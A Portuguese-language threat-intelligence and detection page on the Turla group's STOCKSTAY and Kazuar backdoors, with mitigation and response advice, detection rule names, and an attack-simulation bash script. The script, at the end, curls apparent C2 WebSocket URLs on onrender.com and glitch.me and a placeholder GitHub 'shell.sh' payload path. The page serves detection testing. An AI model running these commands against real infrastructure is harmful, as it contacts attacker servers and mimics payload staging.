Turla (Blizzard Secreto): Backdoors STOCKSTAY e Kazuar Explicados
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Turla é um grupo APT de longa data, alinhado à Rússia, associado ao FSB e conhecido por operações de ciberespionagem contra alvos governamentais e militares. O grupo depende de malwares personalizados, incluindo os backdoors STOCKSTAY e Kazuar, para manter o acesso de longo prazo em ambientes comprometidos. Ele também frequentemente abusa de serviços na nuvem legítimos, como GitHub e Cloudflare, para disfarçar o tráfego de comando e controle.
Investigação
O relatório examina a evolução das ferramentas de malware do Turla, com foco nas famílias STOCKSTAY e Kazuar. Analisa as técnicas de sequestro de infraestrutura do grupo, seu uso de plataformas sem servidor para comando e controle, e sua capacidade de explorar vulnerabilidades, como a de caminho transversal no WinRAR. A investigação também destaca o uso de chaveamento ambiental pelo Turla para reduzir a exposição à análise em sandbox.
Mitigação
As organizações devem implementar monitoramento rigoroso para o uso não autorizado de plataformas web confiáveis, como GitHub e Cloudflare, quando os padrões de tráfego parecerem anormais. A rápida correção de vulnerabilidades como CVE-2025-8088 é essencial para prevenir gravações de arquivos não autorizados. Os defensores também devem ficar atentos à instalação não autorizada de certificados raiz e à execução suspeita de PowerShell ou VBScript que possam indicar atividade do Turla.
Resposta
Se atividade do Turla for detectada, os respondedores devem isolar os hosts afetados e investigar contas de administrador local não autorizadas. Uma revisão detalhada das árvores de processos deve ser realizada para descobrir o carregamento lateral de DLLs envolvendo binários legítimos, como utilitários da NVIDIA ou Brother Printer. A telemetria da rede também deve ser verificada para tráfego incomum de WebSocket, e o armazenamento de confiança da máquina deve ser revisado para alterações suspeitas de certificados.
Fluxo de Ataque
Detecções
Possíveis Pontos de Persistência [ASEPs – Hive do Software/NTUSER] (via evento de registro)
Visualizar
LOLBAS WScript / CScript (via criação de processo)
Visualizar
Uso do Certutil para Codificação de Dados e Operações com Certificados (via linha de comando)
Visualizar
Strings Suspeitas do PowerShell (via powershell)
Visualizar
Possível Serviço DNS Dinâmico foi Contatado (via dns)
Visualizar
Atividade de Descriptografia 3DES do Kazuar PowerShell [Windows Powershell]
Visualizar
Detecção de Comunicação C2 do Turla STOCKSTAY via WebSocket Seguro e Estadiamento no GitHub [Servidor Web]
Visualizar
Execução de Simulação
Pré-requisito: A Verificação Prévia de Telemetria e Linha de Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errôneos.
-
Narrativa do Ataque & Comandos: Um adversário estabeleceu com sucesso uma posição e agora está tentando estabelecer comunicação C2. Para evitar detecção, usam uma abordagem “living-off-the-land” ao se conectar a uma plataforma sem servidor hospedada em
onrender.comvia conexão WebSocket. Simultaneamente, eles tentam puxar uma carga de segunda etapa de um repositório público do GitHub para se misturar com o tráfego de desenvolvedor. A simulação usarácurlandwscat(se disponível) ou solicitações web padrão para gerar os padrões de URL específicos definidos na lógica de detecção. -
Script de Teste de Regressão: [Provide the exact, self-contained, and executable code snippet for the simulation.]
#!/bin/bash # Script de simulação para Validação de Detecção de STOCKSTAY C2 echo "[+] Iniciando Simulação: TTPs do STOCKSTAY C2" # 1. Disparo: WebSocket C2 via Render (URL Específico) echo "[*] Simulando conexão de WebSocket para URL malicioso no Render..." curl -k "wss://google-ai-labs-it.onrender.com/ws" # 2. Disparo: WebSocket C2 via Glitch (URL Específico) echo "[*] Simulando conexão de WebSocket para URL malicioso no Glitch..." curl -k "wss://wool-basalt-clock.glitch.me/ws" # 3. Disparo: Estadiamento no GitHub (Correspondência de Domínio Ampla) echo "[*] Simulando estadiamento de carga via GitHub..." curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh" echo "[+] Simulação Completa. Verifique alertas no SIEM." -
Comandos de Limpeza:
# Nenhum artefato persistente é criado no host por esta simulação. # Garanta que quaisquer arquivos bash temporários sejam removidos, se criados. rm -f simulation_stockstay.sh